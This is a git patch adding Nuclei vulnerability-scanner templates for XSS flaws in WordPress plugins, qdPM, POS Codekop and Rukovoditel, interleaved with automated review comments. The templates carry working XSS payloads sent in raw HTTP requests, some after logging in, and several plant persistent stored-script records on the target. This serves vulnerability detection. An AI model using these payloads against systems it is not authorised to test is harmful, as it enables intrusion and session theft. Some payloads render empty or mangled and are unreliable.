From 332e19282ed450cc6827f71b22a4231403e415c7 Mon Sep 17 00:00:00 2001 
From: Prince Chaddha Date: Fri, 7 Jul 2023 15:08:49 +0530 Subject: [PATCH 1/7] templates added --- cves/2022/CVE-2022-4295.yaml | 34 +++++ cves/2023/CVE-2023-36346.yaml | 42 ++++++ http/cves/2019/CVE-2019-14789.yaml | 42 ++++++ http/cves/2019/CVE-2019-8390.yaml | 70 +++++++++ http/cves/2020/CVE-2020-19515.yaml | 44 ++++++ http/cves/2020/CVE-2020-35984.yaml | 60 ++++++++ http/cves/2020/CVE-2020-35985.yaml | 59 ++++++++ http/cves/2020/CVE-2020-35986.yaml | 60 ++++++++ http/cves/2020/CVE-2020-35987.yaml | 59 ++++++++ http/cves/2022/CVE-2022-43164.yaml | 61 ++++++++ http/cves/2022/CVE-2022-43165.yaml | 60 ++++++++ http/cves/2022/CVE-2022-43166.yaml | 60 ++++++++ http/cves/2022/CVE-2022-43167.yaml | 60 ++++++++ http/cves/2022/CVE-2022-43169.yaml | 59 ++++++++ http/cves/2022/CVE-2022-43170.yaml | 60 ++++++++ http/cves/2022/CVE-2022-43185.yaml | 59 ++++++++ http/cves/2022/CVE-2022-44944.yaml | 61 ++++++++ http/cves/2022/CVE-2022-44946.yaml | 61 ++++++++ http/cves/2022/CVE-2022-44947.yaml | 61 ++++++++ http/cves/2022/CVE-2022-44948.yaml | 59 ++++++++ http/cves/2022/CVE-2022-44949.yaml | 128 ++++++++++++++++ http/cves/2022/CVE-2022-44950.yaml | 128 ++++++++++++++++ http/cves/2022/CVE-2022-44951.yaml | 59 ++++++++ http/cves/2022/CVE-2022-44952.yaml | 142 ++++++++++++++++++ http/cves/2023/CVE-2023-0514.yaml | 46 ++++++ http/cves/2023/CVE-2023-1730.yaml | 36 +++++ http/cves/2023/CVE-2023-1835.yaml | 43 ++++++ http/cves/2023/CVE-2023-1890.yaml | 44 ++++++ http/cves/2023/CVE-2023-2023.yaml | 44 ++++++ http/cves/2023/CVE-2023-2252.yaml | 42 ++++++ http/cves/2023/CVE-2023-2272.yaml | 46 ++++++ http/cves/2023/CVE-2023-30256.yaml | 44 ++++++ http/cves/2023/CVE-2023-30777.yaml | 44 ++++++ http/cves/2023/CVE-2023-36287.yaml | 47 ++++++ http/cves/2023/CVE-2023-36289.yaml | 50 ++++++ http/exposed-panels/qdpm-login-panel.yaml | 35 +++++ .../wordpress/contus-video-gallery-sqli.yaml | 44 ++++++ .../leaguemanager-sql-injection.yaml | 30 ++++ .../wordpress/notificationx-sqli.yaml | 43 ++++++ 
.../wordpress/zero-spam-sql-injection.yaml | 32 ++++ 40 files changed, 2258 insertions(+) create mode 100644 cves/2022/CVE-2022-4295.yaml create mode 100644 cves/2023/CVE-2023-36346.yaml create mode 100644 http/cves/2019/CVE-2019-14789.yaml create mode 100644 http/cves/2019/CVE-2019-8390.yaml create mode 100644 http/cves/2020/CVE-2020-19515.yaml create mode 100644 http/cves/2020/CVE-2020-35984.yaml create mode 100644 http/cves/2020/CVE-2020-35985.yaml create mode 100644 http/cves/2020/CVE-2020-35986.yaml create mode 100644 http/cves/2020/CVE-2020-35987.yaml create mode 100644 http/cves/2022/CVE-2022-43164.yaml create mode 100644 http/cves/2022/CVE-2022-43165.yaml create mode 100644 http/cves/2022/CVE-2022-43166.yaml create mode 100644 http/cves/2022/CVE-2022-43167.yaml create mode 100644 http/cves/2022/CVE-2022-43169.yaml create mode 100644 http/cves/2022/CVE-2022-43170.yaml create mode 100644 http/cves/2022/CVE-2022-43185.yaml create mode 100644 http/cves/2022/CVE-2022-44944.yaml create mode 100644 http/cves/2022/CVE-2022-44946.yaml create mode 100644 http/cves/2022/CVE-2022-44947.yaml create mode 100644 http/cves/2022/CVE-2022-44948.yaml create mode 100644 http/cves/2022/CVE-2022-44949.yaml create mode 100644 http/cves/2022/CVE-2022-44950.yaml create mode 100644 http/cves/2022/CVE-2022-44951.yaml create mode 100644 http/cves/2022/CVE-2022-44952.yaml create mode 100644 http/cves/2023/CVE-2023-0514.yaml create mode 100644 http/cves/2023/CVE-2023-1730.yaml create mode 100644 http/cves/2023/CVE-2023-1835.yaml create mode 100644 http/cves/2023/CVE-2023-1890.yaml create mode 100644 http/cves/2023/CVE-2023-2023.yaml create mode 100644 http/cves/2023/CVE-2023-2252.yaml create mode 100644 http/cves/2023/CVE-2023-2272.yaml create mode 100644 http/cves/2023/CVE-2023-30256.yaml create mode 100644 http/cves/2023/CVE-2023-30777.yaml create mode 100644 http/cves/2023/CVE-2023-36287.yaml create mode 100644 http/cves/2023/CVE-2023-36289.yaml create mode 100644 
http/exposed-panels/qdpm-login-panel.yaml create mode 100644 http/vulnerabilities/wordpress/contus-video-gallery-sqli.yaml create mode 100644 http/vulnerabilities/wordpress/leaguemanager-sql-injection.yaml create mode 100644 http/vulnerabilities/wordpress/notificationx-sqli.yaml create mode 100644 http/vulnerabilities/wordpress/zero-spam-sql-injection.yaml diff --git a/cves/2022/CVE-2022-4295.yaml b/cves/2022/CVE-2022-4295.yaml new file mode 100644 index 0000000000..ccecc02849 --- /dev/null +++ b/cves/2022/CVE-2022-4295.yaml @@ -0,0 +1,34 @@ +id: CVE-2022-4295 + +info: + name: Show all comments < 7.0.1 - Cross-Site Scripting + author: r3Y3r53 + severity: medium + description: | + The Show All Comments WordPress plugin before 7.0.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against a logged in high privilege users such as admin. + reference: + - https://wpscan.com/vulnerability/4ced1a4d-0c1f-42ad-8473-241c68b92b56 + - https://nvd.nist.gov/vuln/detail/CVE-2022-4295 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2022-4295 + cwe-id: CWE-79 + metadata: + verified: true + publicwww-query: /wp-content/plugins/show-all-comments-in-one-page + tags: cve,cve2022,wp,wordpress,wp-plugin,xss,show-all-comments-in-one-page + +http: + - method: GET + path: + - "{{BaseURL}}/wp-admin/admin-ajax.php?action=sac_post_type_call&post_type=" + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(content_type, "text/html")' + - 'contains(body, "")' + - 'contains(body, "Select ")' + condition: and diff --git a/cves/2023/CVE-2023-36346.yaml b/cves/2023/CVE-2023-36346.yaml new file mode 100644 index 0000000000..2df196adc2 --- /dev/null +++ b/cves/2023/CVE-2023-36346.yaml 
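Review bot: The file is added under `cves/2022/` while every other CVE template in this patch lives under `http/cves/`, so it sits outside the protocol-keyed tree the rest of the patch uses; move it to `http/cves/2022/CVE-2022-4295.yaml`. As rendered here the request ends in `post_type=` with no payload and the matcher line reads `contains(body, "")`, which is true for every response — if the committed file really has an empty string there rather than the XSS probe, the template fires on any 200 text/html page, so please confirm both the probe and the echo check survived. The same empty-string match appears in several later templates in this patch.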
@@ -0,0 +1,42 @@ +id: CVE-2023-36346 + +info: + name: POS Codekop v2.0 - Cross-site Scripting (Reflected) + author: r3Y3r53 + severity: medium + description: | + POS Codekop v2.0 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the nm_member parameter at print.php. + reference: + - https://yuyudhn.github.io/pos-codekop-vulnerability/ + - https://www.youtube.com/watch?v=bbbA-q1syrA + - https://nvd.nist.gov/vuln/detail/CVE-2023-36346 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2023-30256 + cwe-id: CWE-79 + metadata: + verified: "true" + tags: cve,cve2023,xss,pos,codekop,unauthenticated + +requests: + - method: GET + path: + - "{{BaseURL}}/print.php?nm_member=" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "" + condition: and + + - type: word + part: header + words: + - 'text/html' + + - type: status + status: + - 200 diff --git a/http/cves/2019/CVE-2019-14789.yaml b/http/cves/2019/CVE-2019-14789.yaml new file mode 100644 index 0000000000..fa9427a85d --- /dev/null +++ b/http/cves/2019/CVE-2019-14789.yaml 
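Review bot: `cve-id: CVE-2023-30256` does not match the template's `id: CVE-2023-36346` (CVE-2023-30256 is a different template in this same patch), so the classification block points at the wrong vulnerability; change it to `cve-id: CVE-2023-36346`. The template also uses the legacy `requests:` key and the `cves/2023/` path while the rest of the patch uses `http:` under `http/cves/`; aligning both keeps the new templates consistent. The `words: - ""` matcher is empty as shown here; if that is how the file was committed it matches every HTML response.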
@@ -0,0 +1,42 @@ +id: CVE-2019-14789 + +info: + name: Custom 404 Pro < 3.2.8 - Cross-Site Scripting + author: r3Y3r53 + severity: medium + description: | + Custom 404 Pro before 3.2.9 is susceptible to cross-site scripting via the title parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + reference: + - https://wpscan.com/vulnerability/81ee1df5-12dc-49d8-8d49-ca28d6f5b7fd + - https://wordpress.org/plugins/custom-404-pro/advanced/ + - https://nvd.nist.gov/vuln/detail/CVE-2019-14789 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2019-14789 + cwe-id: CWE-79 + metadata: + verified: true + tags: cve,cve2023,custom-404-pro,wp,wp-plugin,wordpress,authenticated,xss + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + + - | + GET /wp-admin/admin.php?page=c4p-main&s=%22%3E%3Csvg/onload=alert(document.domain)%3E HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'status_code_2 == 200' + - 'contains(body_2, "")' + - 'contains(body_2, "Custom 404 Pro")' + condition: and diff --git a/http/cves/2019/CVE-2019-8390.yaml b/http/cves/2019/CVE-2019-8390.yaml new file mode 100644 index 0000000000..51c9b057d1 --- /dev/null +++ b/http/cves/2019/CVE-2019-8390.yaml 
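Review bot: The tag list says `cve2023` for a 2019 CVE; it should be `cve2019` so the template is picked up by year-based tag filters. The name says `< 3.2.8` while the description says `before 3.2.9`; only one of these can be the fixed version, and the wpscan reference should settle which. This template submits `{{username}}`/`{{password}}` to `wp-login.php`, so a sentence in the description that valid WordPress credentials are required (the `authenticated` tag alone is easy to miss) would help operators.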
@@ -0,0 +1,70 @@ +id: CVE-2019-8390 + +info: + name: qdPM 9.1 - Cross-site Scripting + author: theamanrawat + severity: medium + description: | + qdPM 9.1 suffers from Cross-site Scripting (XSS) in the search[keywords] parameter. + reference: + - https://www.exploit-db.com/exploits/46399/ + - http://qdpm.net/download-qdpm-free-project-management + - https://nvd.nist.gov/vuln/detail/CVE-2019-8390 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2019-8390 + cwe-id: CWE-79 + metadata: + verified: true + shodan-query: http.favicon.hash:762074255 + max-request: 3 + tags: cve,cve2019,xss,qdpm,authenticated,edb + +http: + - raw: + - | + GET /index.php/login HTTP/1.1 + Host: {{Hostname}} + + - | + POST /index.php/login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + login%5B_csrf_token%5D={{csrf}}&login%5Bemail%5D={{username}}&login%5Bpassword%5D={{password}}&http_referer= + + - | + POST /index.php/users HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + search[keywords]=e">&search_by_extrafields[]=9 + + cookie-reuse: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - '' + - 'alert alert-info alert-search-result' + condition: and + + - type: word + part: header + words: + - 'text/html' + + - type: status + status: + - 200 + + extractors: + - type: regex + name: csrf + part: body + group: 1 + regex: + - 'name="login\[_csrf_token\]" value="(.*?)"' + internal: true diff --git a/http/cves/2020/CVE-2020-19515.yaml b/http/cves/2020/CVE-2020-19515.yaml new file mode 100644 index 0000000000..ad8ee4f768 --- /dev/null +++ b/http/cves/2020/CVE-2020-19515.yaml 
@@ -0,0 +1,44 @@ +id: CVE-2020-19515 + +info: + name: qdPM 9.1 - Cross-site Scripting + author: theamanrawat + severity: medium + description: | + qdPM V9.1 is vulnerable to Cross Site Scripting (XSS) via qdPM\install\modules\database_config.php. + reference: + - https://topsecalphalab.github.io/CVE/qdPM9.1-Installer-Cross-Site-Scripting + - http://qdpm.net/download-qdpm-free-project-management + - https://nvd.nist.gov/vuln/detail/CVE-2020-19515 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2020-19515 + cwe-id: CWE-79 + metadata: + verified: true + shodan-query: http.favicon.hash:762074255 + tags: cve,cve2020,xss,qdpm,unauth + +http: + - method: GET + path: + - "{{BaseURL}}/install/index.php?step=database_config&db_error=" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '' + - 'qdPM' + condition: and + + - type: word + part: header + words: + - 'text/html' + + - type: status + status: + - 200 diff --git a/http/cves/2020/CVE-2020-35984.yaml b/http/cves/2020/CVE-2020-35984.yaml new file mode 100644 index 0000000000..9683b3b423 --- /dev/null +++ b/http/cves/2020/CVE-2020-35984.yaml 
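Review bot: The tag `unauth` here differs from `unauthenticated` used by CVE-2023-36346 in the same patch; pick one spelling so tag filters behave. The check requires `/install/index.php` to still be reachable after deployment, which is a finding in its own right and worth stating in the description, e.g. `Only exploitable while the qdPM installer directory remains exposed; an exposed installer should be reported regardless.`, so a hit is triaged as both an XSS and a leftover installer. The `db_error=` payload appears empty in this rendering; confirm the probe survived in the committed file.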
@@ -0,0 +1,60 @@ +id: CVE-2020-35984 + +info: + name: Rukovoditel <= 2.7.2 - Cross Site Scripting + author: r3Y3r53 + severity: medium + description: | + A stored cross site scripting (XSS) vulnerability in the 'Users Alerts' feature of Rukovoditel 2.7.2 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload entered into the 'Title' parameter. + reference: + - https://github.com/r0ck3t1973/rukovoditel/issues/4 + - http://rukovoditel.com/ + - https://nvd.nist.gov/vuln/detail/CVE-2020-35984 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2020-35984 + cwe-id: CWE-79 + metadata: + verified: "true" + shodan-query: http.favicon.hash:-1499940355 + max-request: 3 + tags: cve,cve2020,rukovoditel,stored,xss,authenticated + +http: + - raw: + - | + GET /index.php?module=users/login HTTP/1.1 + Host: {{Hostname}} + + - | + POST /index.php?module=users/login&action=login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&username={{username}}&password={{password}} + + - | + POST /index.php?module=users_alerts/users_alerts&action=save HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=0¬es=test + + cookie-reuse: true + redirects: true + matchers: + - type: dsl + dsl: + - 'status_code_3 == 200' + - 'contains(body_3, "")' + - 'contains(body_3, "rukovoditel")' + condition: and + + extractors: + - type: regex + name: nonce + group: 1 + regex: + - 'id="form_session_token" value="(.*)" type="hidden"' + internal: true diff --git a/http/cves/2020/CVE-2020-35985.yaml b/http/cves/2020/CVE-2020-35985.yaml new file mode 100644 index 0000000000..6422b35447 --- /dev/null +++ b/http/cves/2020/CVE-2020-35985.yaml 
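Review bot: The `nonce` extractor regex `value="(.*)"` is greedy and will swallow past the token's closing quote if anything else on that line contains a `"`; the qdPM template in this patch uses the non-greedy form, so use `id="form_session_token" value="(.*?)" type="hidden"` here too. The matcher also omits the `contains(content_type_3, "text/html")` condition that CVE-2020-35985 adds, so align the two. The body line `sort_order=0¬es=test` looks like `&notes=test` with `&not` decoded as `¬`; verify the committed file sends `&notes=`.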
@@ -0,0 +1,59 @@ +id: CVE-2020-35985 + +info: + name: Rukovoditel <= 2.7.2 - Cross Site Scripting + author: r3Y3r53 + severity: medium + description: | + A stored cross site scripting (XSS) vulnerability in the 'Global Lists" feature of Rukovoditel 2.7.2 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload entered into the 'Name' parameter. + reference: + - https://github.com/r0ck3t1973/rukovoditel/issues/3 + - http://rukovoditel.com/ + - https://nvd.nist.gov/vuln/detail/CVE-2020-35985 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2020-35985 + cwe-id: CWE-79 + metadata: + verified: true + tags: cve,cve2020,rukovoditel,stored,xss,authenticated + +http: + - raw: + - | + GET /index.php?module=users/login HTTP/1.1 + Host: {{Hostname}} + + - | + POST /index.php?module=users/login&action=login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&username={{username}}&password={{password}} + + - | + POST /index.php?module=global_lists/lists&action=save HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=0¬es=test + + cookie-reuse: true + redirects: true + matchers: + - type: dsl + dsl: + - 'status_code_3 == 200' + - 'contains(content_type_3, "text/html")' + - 'contains(body_3, "")' + - 'contains(body_3, "rukovoditel")' + condition: and + + extractors: + - type: regex + name: nonce + group: 1 + regex: + - 'id="form_session_token" value="(.*)" type="hidden"' + internal: true diff --git a/http/cves/2020/CVE-2020-35986.yaml b/http/cves/2020/CVE-2020-35986.yaml new file mode 100644 index 0000000000..60ffd46e2a --- /dev/null +++ b/http/cves/2020/CVE-2020-35986.yaml 
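Review bot: This template creates a persistent Global List whose name is a `<script>` payload and nothing removes it, so a hit leaves a stored XSS record on the target; the description should say so and tell operators to delete it, e.g. `Note: this check stores a harmless alert() payload in Global Lists; remove the created entry after testing.`. `redirects: true` is set without `max-redirects`, while the 2022 Rukovoditel templates cap it at 2; the cap stops an unexpected redirect chain after login from being followed indefinitely.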
@@ -0,0 +1,60 @@ +id: CVE-2020-35986 + +info: + name: Rukovoditel <= 2.7.2 - Cross Site Scripting + author: r3Y3r53 + severity: medium + description: | + A stored cross site scripting (XSS) vulnerability in the 'Users Access Groups' feature of Rukovoditel 2.7.2 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload entered into the 'Name' parameter. + reference: + - https://github.com/r0ck3t1973/rukovoditel/issues/2 + - http://rukovoditel.com/ + - https://nvd.nist.gov/vuln/detail/CVE-2020-35986 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2020-35986 + cwe-id: CWE-79 + metadata: + verified: "true" + shodan-query: http.favicon.hash:-1499940355 + max-request: 3 + tags: cve,cve2020,rukovoditel,stored,xss,authenticated + +http: + - raw: + - | + GET /index.php?module=users/login HTTP/1.1 + Host: {{Hostname}} + + - | + POST /index.php?module=users/login&action=login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&username={{username}}&password={{password}} + + - | + POST /index.php?module=users_groups/users_groups&action=save HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=0¬es=test + + cookie-reuse: true + redirects: true + matchers: + - type: dsl + dsl: + - 'status_code_3 == 200' + - 'contains(body_3, "")' + - 'contains(body_3, "rukovoditel")' + condition: and + + extractors: + - type: regex + name: nonce + group: 1 + regex: + - 'id="form_session_token" value="(.*)" type="hidden"' + internal: true diff --git a/http/cves/2020/CVE-2020-35987.yaml b/http/cves/2020/CVE-2020-35987.yaml new file mode 100644 index 0000000000..14e50a21e4 --- /dev/null +++ b/http/cves/2020/CVE-2020-35987.yaml 
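Review bot: The matcher checks only status, the script echo and the string `rukovoditel`, without the `contains(content_type_3, "text/html")` condition its siblings CVE-2020-35985 and CVE-2020-35987 include; without it a JSON or plain-text error page that reflects the submitted name would be reported as XSS, so add that line to the DSL list. As with the other 2020 templates, `sort_order=0¬es=test` reads like `&notes=test` mangled by `&not`; confirm the committed body.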
@@ -0,0 +1,59 @@ +id: CVE-2020-35987 + +info: + name: Rukovoditel <= 2.7.2 - Cross-Site Scripting + author: r3Y3r53 + severity: medium + description: | + A stored cross site scripting (XSS) vulnerability in the 'Entities List' feature of Rukovoditel 2.7.2 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload entered into the 'Name' parameter. + reference: + - https://github.com/r0ck3t1973/rukovoditel/issues/1 + - http://rukovoditel.com/ + - https://nvd.nist.gov/vuln/detail/CVE-2020-35987 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2020-35987 + cwe-id: CWE-79 + metadata: + verified: true + tags: cve,cve2020,rukovoditel,xss,authenticated + +http: + - raw: + - | + GET /index.php?module=users/login HTTP/1.1 + Host: {{Hostname}} + + - | + POST /index.php?module=users/login&action=login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&username={{username}}&password={{password}} + + - | + POST /index.php?module=entities/&action=save HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&sort_order=0¬es=test + + cookie-reuse: true + redirects: true + matchers: + - type: dsl + dsl: + - 'status_code_3 == 200' + - 'contains(content_type_3, "text/html")' + - 'contains(body_3, "")' + - 'contains(body_3, "rukovoditel")' + condition: and + + extractors: + - type: regex + name: nonce + internal: true + group: 1 + regex: + - 'id="form_session_token" value="(.*)" type="hidden"' diff --git a/http/cves/2022/CVE-2022-43164.yaml b/http/cves/2022/CVE-2022-43164.yaml new file mode 100644 index 0000000000..8afb4901bd --- /dev/null +++ b/http/cves/2022/CVE-2022-43164.yaml 
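Review bot: The payload uses `alert(document.cookie)` while every other Rukovoditel template in this patch uses `alert(document.domain)`; `document.domain` demonstrates origin without touching session data, so prefer `name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E` for consistency. The `stored` tag present on the sibling 2020 templates is missing here although the description calls it stored XSS. Metadata also lacks the `shodan-query` and `max-request` fields that CVE-2020-35984 carries for the same product.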
@@ -0,0 +1,61 @@ +id: CVE-2022-43164 + +info: + name: Rukovoditel <= 3.2.1 - Cross Site Scripting + author: r3Y3r53 + severity: medium + description: | + A stored cross-site scripting (XSS) vulnerability in the Global Lists feature (/index.php?module=global_lists/lists) of Rukovoditel v3.2.1 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name parameter after clicking "Add". + reference: + - https://github.com/anhdq201/rukovoditel/issues/4 + - http://rukovoditel.com/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-43164 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2022-43164 + cwe-id: CWE-79 + metadata: + verified: "true" + shodan-query: http.favicon.hash:-1499940355 + max-request: 3 + tags: cve,cve2022,rukovoditel,stored,xss,authenticated + +http: + - raw: + - | + GET /index.php?module=users/login HTTP/1.1 + Host: {{Hostname}} + + - | + POST /index.php?module=users/login&action=login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&username={{username}}&password={{password}} + + - | + POST /index.php?module=global_lists/lists&action=save&token={{nonce}} HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E¬es= + + cookie-reuse: true + redirects: true + max-redirects: 2 + matchers: + - type: dsl + dsl: + - 'status_code_3 == 200' + - 'contains(body_3, "")' + - 'contains(body_3, "rukovoditel")' + condition: and + + extractors: + - type: regex + name: nonce + group: 1 + regex: + - 'id="form_session_token" value="(.*)" type="hidden"' + internal: true diff --git a/http/cves/2022/CVE-2022-43165.yaml b/http/cves/2022/CVE-2022-43165.yaml new file mode 100644 index 0000000000..f316ac4f11 --- /dev/null +++ b/http/cves/2022/CVE-2022-43165.yaml 
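Review bot: The matcher lacks the `contains(content_type_3, "text/html")` condition used by CVE-2022-43165 and CVE-2022-43166 in this patch, so a non-HTML response that echoes the name would still match; add it. The description is word-for-word the same as CVE-2022-43185's (Global Lists, Name parameter, "Add"), yet the two templates post to different modules, so at least one description is wrong — see the 43185 hunk. `verified: "true"` as a quoted string here versus bare `verified: true` elsewhere should be normalised.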
@@ -0,0 +1,60 @@ +id: CVE-2022-43165 + +info: + name: Rukovoditel <= 3.2.1 - Cross Site Scripting + author: r3Y3r53 + severity: medium + description: | + A stored cross-site scripting (XSS) vulnerability in the Global Variables feature (/index.php?module=global_vars/vars) of Rukovoditel v3.2.1 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Value parameter after clicking "Create". + reference: + - https://github.com/anhdq201/rukovoditel/issues/5 + - http://rukovoditel.com/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-43165 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2022-43165 + cwe-id: CWE-79 + metadata: + verified: true + shodan-query: http.favicon.hash:-1499940355 + tags: cve,cve2022,rukovoditel,xss,authenticated +http: + - raw: + - | + GET /index.php?module=users/login HTTP/1.1 + Host: {{Hostname}} + + - | + POST /index.php?module=users/login&action=login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&username={{username}}&password={{password}} + + - | + POST /index.php?module=global_vars/vars&action=save&token={{nonce}} HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&is_folder=0&name=1&value=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E¬es=&sort_order= + + cookie-reuse: true + redirects: true + max-redirects: 2 + matchers: + - type: dsl + dsl: + - 'status_code_3 == 200' + - 'contains(content_type_3, "text/html")' + - 'contains(body_3, "")' + - 'contains(body_3, "rukovoditel")' + condition: and + + extractors: + - type: regex + name: nonce + group: 1 + regex: + - 'id="form_session_token" value="(.*)" type="hidden"' + internal: true diff --git a/http/cves/2022/CVE-2022-43166.yaml b/http/cves/2022/CVE-2022-43166.yaml new file mode 100644 index 0000000000..8712f72c85 --- /dev/null 
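Review bot: All eight Rukovoditel 3.2.1 templates are named `Rukovoditel <= 3.2.1 - Cross Site Scripting`, so findings cannot be told apart without opening the template; include the feature in the name, e.g. `name: Rukovoditel <= 3.2.1 - Global Variables Stored Cross-Site Scripting`. Creating a global variable with a `<script>` value persists on the target, so add a cleanup note to the description. `max-request: 3` is missing here but set on CVE-2022-43164 and CVE-2022-43167, which issue the same three requests.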
+++ b/http/cves/2022/CVE-2022-43166.yaml @@ -0,0 +1,60 @@ +id: CVE-2022-43166 + +info: + name: Rukovoditel <= 3.2.1 - Cross Site Scripting + author: r3Y3r53 + severity: medium + description: | + A stored cross-site scripting (XSS) vulnerability in the Global Entities feature (/index.php?module=entities/entities) of Rukovoditel v3.2.1 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name parameter after clicking "Add New Entity". + reference: + - https://github.com/anhdq201/rukovoditel/issues/2 + - http://rukovoditel.com/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-43166 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2022-43166 + cwe-id: CWE-79 + metadata: + verified: true + tags: cve,cve2022,rukovoditel,xss,authenticated + +http: + - raw: + - | + GET /index.php?module=users/login HTTP/1.1 + Host: {{Hostname}} + + - | + POST /index.php?module=users/login&action=login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&username={{username}}&password={{password}} + + - | + POST /index.php?module=entities/&action=save&token={{nonce}} HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&group_id=&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=0¬es= + + cookie-reuse: true + redirects: true + max-redirects: 2 + matchers: + - type: dsl + dsl: + - 'status_code_3 == 200' + - 'contains(content_type_3, "text/html")' + - 'contains(body_3, "")' + - 'contains(body_3, "rukovoditel")' + condition: and + + extractors: + - type: regex + name: nonce + group: 1 + regex: + - 'id="form_session_token" value="(.*)" type="hidden"' + internal: true diff --git a/http/cves/2022/CVE-2022-43167.yaml b/http/cves/2022/CVE-2022-43167.yaml new file mode 100644 index 0000000000..36d78662c1 --- /dev/null 
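Review bot: The template creates a new Entity on the target with a `<script>` name and leaves it in place; of the Rukovoditel checks in this patch this is presumably the most intrusive, since an entity appears to be a top-level object in the application (confirm what the save actually creates), so the description should warn that the scan adds an entity that must be deleted afterwards. The `stored` tag that CVE-2022-43164 and CVE-2022-43167 carry is missing although the description says stored XSS; add it.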
